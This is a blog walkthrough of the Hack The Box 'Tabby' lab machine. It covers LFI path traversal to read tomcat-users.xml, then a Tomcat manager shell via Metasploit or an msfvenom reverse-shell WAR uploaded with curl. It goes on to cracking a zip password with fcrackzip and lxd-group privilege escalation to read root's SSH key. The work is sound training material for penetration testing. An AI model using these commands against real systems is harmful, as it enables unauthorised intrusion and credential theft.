HTB Walkthrough Tabby


Tabby is launched on the 20th of June and is rated as an Easy Box.


Nmap shows there are only 3 ports open, 22,80,8080. on port 80 we see a webpage that is vulnerable to LFI


After finding the LFI and the right file we get credentials for the tomcat server which is running on port 8080. we were able to obtain a shell with metasploit. After some enumeration we found a zip file. after successfully brute forcing the password we were able to switch to the user ash and get the user flag.


Ash id is member of the lxd group which we can use to get root privileges.



nmap -sC -sV


We are getting a page when we visit it also leaks a hostname and e-mailadres

adding hostname to my host file

When we visit the page again with DNS name we get the same page

In the background I start gobuster to see if there are any other interesting files or directory’s

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php

When we click on the news link we get an page not found but the link looks interesting:


This link looks like there could be an LFI (local file inclusion)

Let’s investigate this with burp:

When we visit this page we keep getting unknown host, first I thought there was an brute force detection and cause using gobuster it might have locked me out but after some investigation it turns out that was not the case

when we change the host to we get a page

Now it’s time to see if there is any LFI

change the request to GET /news.php?file=/../../../../../../../../../etc/passwd

Now it’s time to see if we can find any interesting files

When we look at we see there is tomcat installed and there is a way to authenticate. so with this knowledge I start searching for tomcat files which could give me these credentials.

on the tomcat page they mention already a few locations:






The last one doesn’t exist which is a bit odd.

since /usr/share/tomcat9 is the home folder i tried if the etc folder did exist and it did!:

GET /news.php?file=/../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml

Also this page shows this is a default locations:

We found some credentials for tomcat


we cannot login to:

but there is a second one

and we are logged in:

normally we can upload now a war file and get a shell but we cannot do that this time.

Method 1 Shell with Metasploit:

There is a Metasploit module we could try to get a shell:


use exploit/multi/http/tomcat_mgr_deploy

setting options:

after running we obtained our shell:

Method 2 Shell With Curl:

First we need to create a malicious war file we can do this with msvenom:

msfvenom -p java/meterpreter/reverse_tcp LHOST= LPORT=81 -f war -o secwalk.war

Run listener:

msfconsole -x “use exploit/multi/handler; set PAYLOAD java/meterpreter/reverse_tcp; set LHOST; set LPORT 81; run”

curl command to upload war file:

curl -T secwalk.war http://tomcat:\$3cureP4s5w0rd123\!@


and we have our shell:

Getting other user:

after looking around we find a zip file named

transfer file to my machine:

on victim machine: nc -w 3 81 <

on my machine: nc -l -p 81 >

after trying unzipping it is password protected. i used fcrackzip to bruteforce the password:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u

password found:



files didn’t contain any interesting stuff so lets try if this works for the user ash:

We got our user shell:

Privilege escalation

id command shows ash is a member of the lxd group

it could be vulnerable to this so let’s try out:


git clone

cd lxd-alpine-builder/


python -m SimpleHTTPServer 80

on target machine:


lxc image import alpine-v3.12-x86_64-20200621_0657.tar.gz –alias secwalk

lxc init secwalk ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/secwalk/ recursive=true

lxc start ignite

lxc exec ignite /bin/sh

This image has an empty alt attribute; its file name is image-161.png

cd /mount/secwalk

cat /root/.ssh/id_rsa

chmod 600 id_rsa

ssh -i id_rsa root@

and we successfully rooted this machine

Made by S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply